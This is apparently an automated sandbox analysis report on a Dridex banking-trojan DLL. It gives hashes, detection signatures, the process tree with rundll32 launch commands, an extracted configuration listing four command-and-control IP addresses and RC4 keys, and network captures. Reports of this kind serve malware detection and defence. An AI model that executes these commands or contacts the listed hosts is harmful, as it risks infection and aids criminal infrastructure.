Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.19803.14094

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Razy.980776.19803.14094 (renamed file extension from 14094 to dll)
Analysis ID: 510692
MD5: 617b1fd1bfdab72e5562c0c2f7600bcb
SHA1: 9e5bf19ba51cbd5849a225f022b939a48e5769b3
SHA256: 9b9c38d267cedfb2c423fbad71a50f76d0743a3ecc8f6027029fa13ea36e00e4
Tags: dll

Detection

Dridex
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5856 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6508 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6540 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6556 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3312 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5364 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.838096083.000000006E651000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000004.00000003.417154756.0000000003200000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000006.00000003.439012632.0000000002D50000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000004.00000002.869577587.000000006E651000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
00000005.00000003.431444346.0000000004DA0000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security

Unpacked PEs

Source | Rule | Description | Author
3.3.rundll32.exe.53db55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
0.3.loaddll32.exe.104db55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
6.3.rundll32.exe.2d6db55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
4.3.rundll32.exe.321db55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security
4.2.rundll32.exe.6e650000.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0.3.loaddll32.exe.104db55.0.raw.unpack | Malware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Variant.Razy.980776.19803.dll | Virustotal: Detection: 7%
Source: SecuriteInfo.com.Variant.Razy.980776.19803.dll | ReversingLabs: Detection: 18%
Source: SecuriteInfo.com.Variant.Razy.980776.19803.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Razy.980776.19803.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.845974920.000000006E717000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.888666799.000000006E717000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.19803.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E67CEF8 FindFirstFileExW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.77.0.96 235
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.56.219.47 180
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.46.210.220 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 143.244.140.214 40
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | IPs: 192.46.210.220:443
Source: Malware configuration extractor | IPs: 143.244.140.214:808
Source: Malware configuration extractor | IPs: 45.77.0.96:6891
Source: Malware configuration extractor | IPs: 185.56.219.47:8116
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | ASN Name: KELIWEBIT KELIWEBIT
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 192.46.210.220 | Content-Length: 4814 | Connection: Close | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Host: 192.46.210.220 | Content-Length: 4802 | Connection: Close | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 45.77.0.96 45.77.0.96
Source: Joe Sandbox View | IP Address: 185.56.219.47 185.56.219.47
Source: global traffic | TCP traffic: 192.168.2.3:49748 -> 143.244.140.214:808
Source: global traffic | TCP traffic: 192.168.2.3:49751 -> 45.77.0.96:6891
Source: global traffic | TCP traffic: 192.168.2.3:49753 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                      Source: global traffic; HTTP traffic detected:
                        HTTP/1.1 403 Forbidden
                        Server: nginx/1.15.12
                        Date: Thu, 28 Oct 2021 03:03:46 GMT
                        Content-Type: text/plain; charset=utf-8
                        Connection: close
                      Source: unknown; TCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknown; TCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown; TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000004.00000003.454870700.00000000033DB000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.454870700.00000000033DB000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000004.00000003.453106675.0000000005465000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?24307bc719346
                      Source: rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214/
                      Source: rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.F
                      Source: loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://18185.56.219.47:8116/~
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://1845.77.0.96:6891/
                      Source: rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/m
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: rundll32.exe, 00000004.00000003.715591427.0000000003441000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/.
                      Source: loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4
                      Source: loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/B
                      Source: rundll32.exe, 00000004.00000003.601489285.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.768805563.00000000033D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.462417469.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ES
                      Source: loaddll32.exe, 00000000.00000003.819035845.0000000001150000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.740542417.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: rundll32.exe, 00000004.00000003.548484641.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/h:
                      Source: loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/l
                      Source: rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll
                      Source: rundll32.exe, 00000004.00000003.690111757.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.505189315.0000000001151000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.506581152.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/v
                      Source: rundll32.exe, 00000004.00000003.479096259.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/wsupdate.com.edgesuite.nettm
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/x
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.670962409.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.802350875.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/#
                      Source: rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/$
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/&
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220//
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/0Z0W1
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/1-0
                      Source: loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/8
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/;
                      Source: loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/B
                      Source: loaddll32.exe, 00000000.00000003.463671472.0000000001151000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/C
                      Source: rundll32.exe, 00000004.00000002.839402088.000000000343A000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/I
                      Source: loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/K
                      Source: loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/P
                      Source: loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/W
                      Source: loaddll32.exe, 00000000.00000003.779467941.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllltb
                      Source: rundll32.exe, 00000004.00000003.819391649.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/e
                      Source: loaddll32.exe, 00000000.00000003.779467941.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/f
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/g
                      Source: loaddll32.exe, 00000000.00000003.512614801.0000000001157000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/graphy
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ntrust
                      Source: rundll32.exe, 00000004.00000003.498135306.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/o
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.558714195.0000000001155000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690111757.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/s
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/t
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/trust
                      Source: rundll32.exe, 00000004.00000003.515187644.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/v
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/y
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/z
                      Source: rundll32.exe, 00000004.00000003.707287574.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/~
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/(6
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/J
                      Source: loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.456386588.0000000005467000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: rundll32.exe, 00000004.00000003.456386588.0000000005467000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/)
                      Source: loaddll32.exe, 00000000.00000003.684059514.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.774221370.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.833374830.00000000033D7000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/08/
                      Source: loaddll32.exe, 00000000.00000003.512614801.0000000001157000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/2
                      Source: loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/B
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/J
                      Source: loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/N
                      Source: loaddll32.exe, 00000000.00000003.505189315.0000000001151000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Zm
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/b
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der
                      Source: loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/derR
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/e
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456349641.0000000003414000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll
                      Source: loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll9
                      Source: rundll32.exe, 00000004.00000003.508903560.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h9
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/k
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/r
                      Source: rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/v
